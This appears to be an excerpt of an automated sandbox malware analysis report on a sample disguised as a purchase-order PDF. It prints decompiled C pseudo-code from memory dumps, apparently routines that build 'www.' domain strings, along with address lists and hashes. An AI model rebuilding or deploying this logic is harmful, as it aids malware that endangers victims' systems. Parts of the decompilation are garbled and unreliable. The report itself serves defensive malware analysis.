                                            							_t282 = _t279 + 0x34;
                                            							 *((intOrPtr*)(_t276 - 0x14)) = 0;
                                            							_t265 = 0;
                                            							do {
                                            								__eflags =  *((intOrPtr*)(_t270 + 0x1164)) - _t208;
                                            								if( *((intOrPtr*)(_t270 + 0x1164)) != _t208) {
                                            									E0041BE00(_t276 - 0x58, 0x2e);
                                            									 *((short*)(_t276 - 0x308)) = 0;
                                            									E0041BE50(_t276 - 0x306, 0, 0x206);
                                            									E0041BE00( *((intOrPtr*)(_t270 + 0x14a0)) + _t265, 0x388);
                                            									_t151 = E0041C3C0();
                                            									_t42 = _t208 - 1; // -1
                                            									 *( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x40) = _t151 * _t42 & 0x00000001;
                                            									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x87, _t276 - 0x98, E0041C0A0(_t276 - 0x98));
                                            									_t50 = _t276 - 8; // 0x2e777777
                                            									E0041BDD0(_t276 - 0x58, _t50, 4);
                                            									_push(4);
                                            									E0040AFA0(_t208, _t270, __eflags, _t270, _t276 + E0041C0A0(_t276 - 0x58) - 0x58,  *(_t276 + _t208 - 0x10) & 0x000000ff);
                                            									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265, _t276 - 0x58, E0041C0A0(_t276 - 0x58));
                                            									_t166 = E0041C0A0(_t276 - 0x58);
                                            									_t210 = _t270 + 0xe90;
                                            									 *((intOrPtr*)(_t276 - 0x18)) = _t166;
                                            									E0041C1D0(_t276 - 0x58, _t270 + 0xe90, 0);
                                            									E00409E10(_t276 - 0x100);
                                            									E0040AB60(_t276 - 0x100, _t276 - 0x58, E0041C0A0(_t276 - 0x58));
                                            									E0040AB30(_t276 - 0x100);
                                            									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x72, _t276 - 0x100, 0x14);
                                            									 *((char*)(_t276 +  *((intOrPtr*)(_t276 - 0x18)) - 0x58)) = 0;
                                            									 *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x4c)) = 2;
                                            									 *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x50)) = 1;
                                            									E0040B030(_t270 + 0xe90, _t270, __eflags, _t270, _t276 - 0x308, 0x41, 1);
                                            									E0041C470( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x308);
                                            									E0040B030(_t270 + 0xe90, _t270, __eflags, _t270, _t276 - 0x308, 0x42, 1);
                                            									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x308);
                                            									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x58, 0);
                                            									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x45, 1);
                                            									E0041C470( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x308);
                                            									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x46, 1);
                                            									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x308);
                                            									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x58, 0);
                                            									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x4a, 1);
                                            									__eflags = E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287) +  *((intOrPtr*)(_t270 + 0x14a0));
                                            									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t276 - 0x308);
                                            									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t276 - 0x58, 0);
                                            									_t146 = E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t210, 0);
                                            									_t208 =  *((intOrPtr*)(_t276 - 0x14));
                                            									_t282 = _t282 + 0x144;
                                            								}
                                            								_t208 = _t208 + 1;
                                            								_t265 = _t265 + 0x388;
                                            								 *((intOrPtr*)(_t276 - 0x14)) = _t208;
                                            								__eflags = _t265 - 0x1c40;
                                            							} while (_t265 < 0x1c40);
                                            							return _t146;
                                            						} else {
                                            							if(__eflags <= 0) {
                                            								return _t133;
                                            							} else {
                                            								_pop(__esp);
                                            								asm("clc");
                                            								asm("loop 0xffffffb8");
                                            								__esp = __esp - 1;
                                            								asm("aad 0xd9");
                                            								_t8 = __eax;
                                            								__eax = __edx;
                                            								__edx = _t8;
                                            								_pop(__esp);
                                            								asm("loopne 0x62");
                                            								__eflags = __eax - 0x5f9a7a0c;
                                            								_pop(__edi);
                                            								_pop(__ebx);
                                            								__esp = __ebp;
                                            								_pop(__ebp);
                                            								return __eax;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}





















                                            0x00417d59
                                            0x00417d5b
                                            0x00417d5c
                                            0x00417d61
                                            0x00417d66
                                            0x00417d69
                                            0x00417d6d
                                            0x00417d70
                                            0x00417d71
                                            0x00417d73
                                            0x00417d74
                                            0x00417dd0
                                            0x00417dd5
                                            0x00417dd6
                                            0x00417dd8
                                            0x00417ddd
                                            0x00417ddf
                                            0x00417de2
                                            0x00417de6
                                            0x00000000
                                            0x00417d76
                                            0x00417d78
                                            0x00417d7d
                                            0x00417de9
                                            0x00417de9
                                            0x00000000
                                            0x00417d7f
                                            0x00417d7f
                                            0x00417d81
                                            0x00417d82
                                            0x00417d84
                                            0x00417d86
                                            0x00417d86
                                            0x00417d86
                                            0x00417d89
                                            0x00417d8a
                                            0x00417d8b
                                            0x00417d8c
                                            0x00417d8c
                                            0x00417d94
                                            0x00417d9a
                                            0x00417deb
                                            0x00417deb
                                            0x00417dec
                                            0x00417ded
                                            0x00417df0
                                            0x00417df0
                                            0x00417df2
                                            0x00417df9
                                            0x00417dfe
                                            0x00417e01
                                            0x00417e01
                                            0x00417e03
                                            0x00417e03
                                            0x00417e07
                                            0x00000000
                                            0x00000000
                                            0x00417e09
                                            0x00417e0a
                                            0x00417e0c
                                            0x00000000
                                            0x00417e0e
                                            0x00417e0e
                                            0x00417e10
                                            0x00417e12
                                            0x00417e16
                                            0x00417e16
                                            0x00417e16
                                            0x00417e10
                                            0x00000000
                                            0x00417e0c
                                            0x00417e17
                                            0x00417e17
                                            0x00417e17
                                            0x00417e28
                                            0x00417e2f
                                            0x00417e33
                                            0x00417e37
                                            0x00417e3a
                                            0x00417e40
                                            0x00417e51
                                            0x00417e58
                                            0x00417e59
                                            0x00417e6e
                                            0x00417e81
                                            0x00417e98
                                            0x00417e99
                                            0x00417e9e
                                            0x00417e9e
                                            0x00417ea1
                                            0x00417ea3
                                            0x00417ea6
                                            0x00417ea9
                                            0x00417eb0
                                            0x00417eb0
                                            0x00417eb6
                                            0x00417ec2
                                            0x00417ed6
                                            0x00417edd
                                            0x00417ef0
                                            0x00417ef5
                                            0x00417f00
                                            0x00417f09
                                            0x00417f2f
                                            0x00417f36
                                            0x00417f3e
                                            0x00417f4b
                                            0x00417f60
                                            0x00417f7c
                                            0x00417f85
                                            0x00417f8c
                                            0x00417f97
                                            0x00417f9a
                                            0x00417fa6
                                            0x00417fc0
                                            0x00417fcf
                                            0x00417fe8
                                            0x00417ff6
                                            0x00418005
                                            0x00418015
                                            0x0041801d
                                            0x00418037
                                            0x00418048
                                            0x0041807b
                                            0x00418094
                                            0x004180a5
                                            0x004180bf
                                            0x004180d0
                                            0x00418103
                                            0x0041811c
                                            0x0041812d
                                            0x0041814f
                                            0x00418160
                                            0x00418179
                                            0x0041818f
                                            0x00418194
                                            0x00418197
                                            0x00418197
                                            0x0041819a
                                            0x0041819b
                                            0x004181a1
                                            0x004181a4
                                            0x004181a4
                                            0x004181b6
                                            0x00417d9c
                                            0x00417d9c
                                            0x00417d54
                                            0x00417d9e
                                            0x00417d9e
                                            0x00417d9f
                                            0x00417da0
                                            0x00417da2
                                            0x00417da3
                                            0x00417da6
                                            0x00417da6
                                            0x00417da6
                                            0x00417da7
                                            0x00417da8
                                            0x00417daa
                                            0x00417db3
                                            0x00417db5
                                            0x00417db6
                                            0x00417db8
                                            0x00417db9
                                            0x00417db9
                                            0x00417d9c
                                            0x00417d9a
                                            0x00417d7d

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: =$www.$www.
                                            • API String ID: 0-3343787489
                                            • Opcode ID: 8a944a9b402d0d0ed6a3a3ef3331b2e971090a9b4d61c8070f3ce8e7ca7e0f04
                                            • Instruction ID: 9399eecbde9e477954d2b2faad7fa9a924461dd1ea6b35e22424a4e98376033e
                                            • Opcode Fuzzy Hash: 8a944a9b402d0d0ed6a3a3ef3331b2e971090a9b4d61c8070f3ce8e7ca7e0f04
                                            • Instruction Fuzzy Hash: E4C10871944308AADB14DBF0CC82FEB7779AF44308F40455EF6595B182DB78A684CBE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E00417DBA(void* __eflags, char _a1, char _a8) {
                                            				char _v1;
                                            				short _v3;
                                            				char _v4;
                                            				char _v8;
                                            				signed char _v9;
                                            				short _v15;
                                            				intOrPtr _v19;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				void* _v87;
                                            				char _v88;
                                            				char _v151;
                                            				char _v152;
                                            				char _v256;
                                            				char _v774;
                                            				char _v776;
                                            				void* __ebx;
                                            				signed int __esi;
                                            				signed int __ebp;
                                            				void* _t130;
                                            				char _t131;
                                            				void* _t141;
                                            				signed int _t146;
                                            				intOrPtr _t161;
                                            				intOrPtr _t202;
                                            				signed int _t205;
                                            				void* _t258;
                                            				signed int _t260;
                                            				intOrPtr _t261;
                                            				void* _t263;
                                            				void* _t265;
                                            				void* _t268;
                                            
                                            				if(__eflags <= 0) {
                                            					L15:
                                            					_t260 = _t260 + 1;
                                            					__eflags = _t260;
                                            					goto L16;
                                            				} else {
                                            					asm("lodsb");
                                            					if(__eflags == 0) {
                                            						__ebx = __ebx - 1;
                                            						_push(__edi);
                                            						_t1 = __eax;
                                            						__eax = __ebp;
                                            						__ebp = _t1;
                                            						__al = __al ^ 0x000000e1;
                                            						asm("outsd");
                                            						__esp = __esp + 1;
                                            						__esp = __esp |  *(__edi + 0x258c24c4);
                                            						__eflags = __esp;
                                            						__al = 0x61;
                                            						ss =  *((intOrPtr*)(__eax - 0x568099b));
                                            						if(__eflags <= 0) {
                                            							goto L9;
                                            						} else {
                                            							if(__eflags <= 0) {
                                            								return _t130;
                                            							} else {
                                            								_pop(__esp);
                                            								asm("clc");
                                            								asm("loop 0xffffffb8");
                                            								__esp = __esp - 1;
                                            								asm("aad 0xd9");
                                            								_t4 = __eax;
                                            								__eax = __edx;
                                            								__edx = _t4;
                                            								_pop(__esp);
                                            								asm("loopne 0x62");
                                            								__eflags = __eax - 0x5f9a7a0c;
                                            								_pop(__edi);
                                            								_pop(__ebx);
                                            								__esp = __ebp;
                                            								_pop(__ebp);
                                            								return __eax;
                                            							}
                                            						}
                                            					} else {
                                            						_push(__ebp);
                                            						__ebp = __esp;
                                            						__esp = __esp - 0x308;
                                            						_push(__ebx);
                                            						_push(__edi);
                                            						_push(0x3f);
                                            						__eax =  &_v87;
                                            						__ebp =  &_v3;
                                            						__eflags =  &_v87 & 0xc650006a;
                                            						__ebp =  &_v3;
                                            						__eflags = __al & 0x00000000;
                                            						E0041BE50() = 0;
                                            						__eflags = 0;
                                            						__esp = __esp + 0xc;
                                            						_v20 = 0;
                                            						_v19 = 0;
                                            						_v15 = __ax;
                                            						L9:
                                            						__ebp =  &_a1;
                                            						asm("cmc");
                                            						_v9 = __al;
                                            						__esi = 0;
                                            						__eflags = 0;
                                            						L10:
                                            						_t131 = E0040A470(__eflags, 0x4e, 0x8d);
                                            						_t265 = _t265 + 8;
                                            						_t205 = 0;
                                            						__eflags = 0;
                                            						while(1) {
                                            							__eflags = _t131 -  *((intOrPtr*)(_t263 + _t205 - 0x10));
                                            							if(_t131 ==  *((intOrPtr*)(_t263 + _t205 - 0x10))) {
                                            								break;
                                            							}
                                            							_t205 = _t205 + 1;
                                            							__eflags = _t205 - _t260;
                                            							if(_t205 <= _t260) {
                                            								continue;
                                            							} else {
                                            								__eflags = _t131;
                                            								if(_t131 != 0) {
                                            									 *((char*)(_t263 + _t260 - 0x10)) = _t131;
                                            									goto L15;
                                            								}
                                            							}
                                            							break;
                                            						}
                                            						L16:
                                            						__eflags = _t260 - 8;
                                            						if(__eflags < 0) {
                                            							goto L10;
                                            						}
                                            						_v8 = 0x2e777777;
                                            						_v4 = 0;
                                            						_v3 = 0;
                                            						_v1 = 0;
                                            						_v152 = 0;
                                            						E0041BE50( &_v151, 0, 0x3f);
                                            						_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
                                            						_push( &_v152);
                                            						E0041C700();
                                            						 *((char*)(_t263 + E0041C0A0( &_v152) - 0x98)) = 0x3d;
                                            						_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
                                            						_push(_t263 + E0041C0A0( &_v152) - 0x98);
                                            						_t141 = E0041C700();
                                            						_t31 =  &_a8; // 0x2e777777
                                            						_t261 =  *_t31;
                                            						_t202 = 0;
                                            						_t268 = _t265 + 0x34;
                                            						_v20 = 0;
                                            						_t258 = 0;
                                            						do {
                                            							__eflags =  *((intOrPtr*)(_t261 + 0x1164)) - _t202;
                                            							if( *((intOrPtr*)(_t261 + 0x1164)) != _t202) {
                                            								E0041BE00( &_v88, 0x2e);
                                            								_v776 = 0;
                                            								E0041BE50( &_v774, 0, 0x206);
                                            								E0041BE00( *((intOrPtr*)(_t261 + 0x14a0)) + _t258, 0x388);
                                            								_t146 = E0041C3C0();
                                            								_t39 = _t202 - 1; // -1
                                            								 *( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x40) = _t146 * _t39 & 0x00000001;
                                            								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x87,  &_v152, E0041C0A0( &_v152));
                                            								_t47 =  &_v8; // 0x2e777777
                                            								E0041BDD0( &_v88, _t47, 4);
                                            								_push(4);
                                            								E0040AFA0(_t202, _t261, __eflags, _t261, _t263 + E0041C0A0( &_v88) - 0x58,  *(_t263 + _t202 - 0x10) & 0x000000ff);
                                            								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258,  &_v88, E0041C0A0( &_v88));
                                            								_t161 = E0041C0A0( &_v88);
                                            								_t204 = _t261 + 0xe90;
                                            								_v24 = _t161;
                                            								E0041C1D0( &_v88, _t261 + 0xe90, 0);
                                            								E00409E10( &_v256);
                                            								E0040AB60( &_v256,  &_v88, E0041C0A0( &_v88));
                                            								E0040AB30( &_v256);
                                            								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x72,  &_v256, 0x14);
                                            								 *((char*)(_t263 + _v24 - 0x58)) = 0;
                                            								 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x4c)) = 2;
                                            								 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x50)) = 1;
                                            								E0040B030(_t261 + 0xe90, _t261, __eflags, _t261,  &_v776, 0x41, 1);
                                            								E0041C470( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v776);
                                            								E0040B030(_t261 + 0xe90, _t261, __eflags, _t261,  &_v776, 0x42, 1);
                                            								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v776);
                                            								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v88, 0);
                                            								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x45, 1);
                                            								E0041C470( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v776);
                                            								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x46, 1);
                                            								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v776);
                                            								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v88, 0);
                                            								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x4a, 1);
                                            								__eflags = E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287) +  *((intOrPtr*)(_t261 + 0x14a0));
                                            								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287,  &_v776);
                                            								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287,  &_v88, 0);
                                            								_t141 = E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287, _t204, 0);
                                            								_t202 = _v20;
                                            								_t268 = _t268 + 0x144;
                                            							}
                                            							_t202 = _t202 + 1;
                                            							_t258 = _t258 + 0x388;
                                            							_v20 = _t202;
                                            							__eflags = _t258 - 0x1c40;
                                            						} while (_t258 < 0x1c40);
                                            						return _t141;
                                            					}
                                            				}
                                            			}



































                                            0x00417dbb
                                            0x00417e16
                                            0x00417e16
                                            0x00417e16
                                            0x00000000
                                            0x00417dbd
                                            0x00417dbd
                                            0x00417dbe
                                            0x00417d84
                                            0x00417d85
                                            0x00417d86
                                            0x00417d86
                                            0x00417d86
                                            0x00417d87
                                            0x00417d8a
                                            0x00417d8b
                                            0x00417d8c
                                            0x00417d8c
                                            0x00417d92
                                            0x00417d94
                                            0x00417d9a
                                            0x00000000
                                            0x00417d9c
                                            0x00417d9c
                                            0x00417d54
                                            0x00417d9e
                                            0x00417d9e
                                            0x00417d9f
                                            0x00417da0
                                            0x00417da2
                                            0x00417da3
                                            0x00417da6
                                            0x00417da6
                                            0x00417da6
                                            0x00417da7
                                            0x00417da8
                                            0x00417daa
                                            0x00417db3
                                            0x00417db5
                                            0x00417db6
                                            0x00417db8
                                            0x00417db9
                                            0x00417db9
                                            0x00417d9c
                                            0x00417dc0
                                            0x00417dc0
                                            0x00417dc1
                                            0x00417dc3
                                            0x00417dc9
                                            0x00417dcb
                                            0x00417dcc
                                            0x00417dce
                                            0x00417dcf
                                            0x00417dd0
                                            0x00417dd5
                                            0x00417dd6
                                            0x00417ddd
                                            0x00417ddd
                                            0x00417ddf
                                            0x00417de2
                                            0x00417de6
                                            0x00417de9
                                            0x00417deb
                                            0x00417deb
                                            0x00417dec
                                            0x00417ded
                                            0x00417df0
                                            0x00417df0
                                            0x00417df2
                                            0x00417df9
                                            0x00417dfe
                                            0x00417e01
                                            0x00417e01
                                            0x00417e03
                                            0x00417e03
                                            0x00417e07
                                            0x00000000
                                            0x00000000
                                            0x00417e09
                                            0x00417e0a
                                            0x00417e0c
                                            0x00000000
                                            0x00417e0e
                                            0x00417e0e
                                            0x00417e10
                                            0x00417e12
                                            0x00000000
                                            0x00417e12
                                            0x00417e10
                                            0x00000000
                                            0x00417e0c
                                            0x00417e17
                                            0x00417e17
                                            0x00417e1a
                                            0x00000000
                                            0x00000000
                                            0x00417e28
                                            0x00417e2f
                                            0x00417e33
                                            0x00417e37
                                            0x00417e3a
                                            0x00417e40
                                            0x00417e51
                                            0x00417e58
                                            0x00417e59
                                            0x00417e6e
                                            0x00417e81
                                            0x00417e98
                                            0x00417e99
                                            0x00417e9e
                                            0x00417e9e
                                            0x00417ea1
                                            0x00417ea3
                                            0x00417ea6
                                            0x00417ea9
                                            0x00417eb0
                                            0x00417eb0
                                            0x00417eb6
                                            0x00417ec2
                                            0x00417ed6
                                            0x00417edd
                                            0x00417ef0
                                            0x00417ef5
                                            0x00417f00
                                            0x00417f09
                                            0x00417f2f
                                            0x00417f36
                                            0x00417f3e
                                            0x00417f4b
                                            0x00417f60
                                            0x00417f7c
                                            0x00417f85
                                            0x00417f8c
                                            0x00417f97
                                            0x00417f9a
                                            0x00417fa6
                                            0x00417fc0
                                            0x00417fcf
                                            0x00417fe8
                                            0x00417ff6
                                            0x00418005
                                            0x00418015
                                            0x0041801d
                                            0x00418037
                                            0x00418048
                                            0x0041807b
                                            0x00418094
                                            0x004180a5
                                            0x004180bf
                                            0x004180d0
                                            0x00418103
                                            0x0041811c
                                            0x0041812d
                                            0x0041814f
                                            0x00418160
                                            0x00418179
                                            0x0041818f
                                            0x00418194
                                            0x00418197
                                            0x00418197
                                            0x0041819a
                                            0x0041819b
                                            0x004181a1
                                            0x004181a4
                                            0x004181a4
                                            0x004181b6
                                            0x004181b6
                                            0x00417dbe

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: =$www.$www.
                                            • API String ID: 0-3343787489
                                            • Opcode ID: b76590bac70fb8f4ea37fdd1d6f1b4d20e8c6e2921ca3651e162067a57bc2f42
                                            • Instruction ID: 21e62ffafc17393f92fbf02c5aaee946e2e31f17f34cd70437b64aca7f0b3693
                                            • Opcode Fuzzy Hash: b76590bac70fb8f4ea37fdd1d6f1b4d20e8c6e2921ca3651e162067a57bc2f42
                                            • Instruction Fuzzy Hash: 1DC1D972944308AADB14DBF0CC82FEF777DAF44708F40455EB25957182DA78A684CBE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df8436db17f74422f808355b62420446ace938b1f1e264b8164da6e6704c86cb
                                            • Instruction ID: 77344f3c8e1c3f2b142b95e803c083439d94a431ed2d488ad31fd13f123a523f
                                            • Opcode Fuzzy Hash: df8436db17f74422f808355b62420446ace938b1f1e264b8164da6e6704c86cb
                                            • Instruction Fuzzy Hash: A8C09B27E4C15515C6552D5574114F5F774D683269F2032FBDD58B750141038433A57C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba1a944b3024a26791cb308013057ac68e935aeb56752517a9ff9ba04c094d99
                                            • Instruction ID: 171baf67410d92bc86e0e30b2307a6f9093af5132fd6662712e54f5323e7dee4
                                            • Opcode Fuzzy Hash: ba1a944b3024a26791cb308013057ac68e935aeb56752517a9ff9ba04c094d99
                                            • Instruction Fuzzy Hash: 0590023165544012924471584C88547400997E0342B61C021E0865594CCE1889565362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E00A29006(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                            				short _t95;
                                            				intOrPtr _t110;
                                            				short _t118;
                                            				signed int _t131;
                                            				intOrPtr _t136;
                                            				intOrPtr _t140;
                                            				intOrPtr _t146;
                                            				intOrPtr* _t148;
                                            				intOrPtr _t151;
                                            				intOrPtr _t152;
                                            				intOrPtr* _t154;
                                            				void* _t156;
                                            
                                            				_t141 = __edx;
                                            				_push(0x154);
                                            				_push(0xafbce8);
                                            				L00A77B20(__ebx, __edi, __esi);
                                            				 *(_t156 - 0xf0) = __edx;
                                            				_t151 = __ecx;
                                            				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                            				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                            				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                            				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                            				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                            				 *((short*)(_t156 - 0xda)) = 0;
                                            				 *(_t156 - 0xe0) = 0;
                                            				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                            				L00A68F30(_t156 - 0x13c, 0, 0x3c);
                                            				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                            				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                            				_t131 = 7;
                                            				memset(_t156 - 0x15c, 0, _t131 << 2);
                                            				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                            				_t152 = L00A39830(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                            				if(_t152 >= 0) {
                                            					if( *0xb165e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                            						goto L1;
                                            					} else {
                                            						_t152 = E00A3A130(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                            						if(_t152 < 0) {
                                            							goto L1;
                                            						}
                                            						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                            							L11:
                                            							_t152 = 0xc0150005;
                                            							goto L1;
                                            						}
                                            						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                            							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                            								 *(_t156 - 0x120) = 0xfffffffc;
                                            							}
                                            						} else {
                                            							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                            						}
                                            						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                            						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                            						 *((short*)(_t156 - 0xda)) = _t95;
                                            						 *((short*)(_t156 - 0xdc)) = _t95;
                                            						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                            						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                            						 *((short*)(_t156 - 0xea)) = 0xaa;
                                            						_t152 = L00A45A10(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                            						if(_t152 < 0 || L00A40490(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                            							goto L1;
                                            						} else {
                                            							_t154 =  *0xb165e0; // 0x7555a680
                                            							 *0xb191e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                            							_t152 =  *_t154();
                                            							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                            							if(_t152 < 0) {
                                            								goto L1;
                                            							} else {
                                            								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                            								if(_t110 == 0xffffffff) {
                                            									L26:
                                            									 *((intOrPtr*)(_t156 - 4)) = 1;
                                            									_t148 =  *0xb165e8;
                                            									if(_t148 != 0) {
                                            										 *0xb191e0(_t110);
                                            										 *_t148();
                                            									}
                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                            									goto L1;
                                            								}
                                            								L00A3DC10(_t156 - 0x164, _t110);
                                            								 *((intOrPtr*)(_t156 - 4)) = 0;
                                            								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                            									L00A33B40(_t146);
                                            								}
                                            								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                            								_t152 = L00A39830(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                            								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                            								if(_t152 < 0) {
                                            									L25:
                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                            									_t110 = E00A8235B();
                                            									goto L26;
                                            								} else {
                                            									_t152 = E00A3A130(7, 0, 2, _t149, _t156 - 0x140);
                                            									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                            									if(_t152 < 0) {
                                            										goto L25;
                                            									}
                                            									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                            										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                            										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                            										 *((short*)(_t156 - 0xda)) = _t118;
                                            										 *((short*)(_t156 - 0xdc)) = _t118;
                                            										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                            										if(L00A40490(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                            											goto L25;
                                            										}
                                            										_t152 = 0xc0150004;
                                            										L24:
                                            										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                            										goto L25;
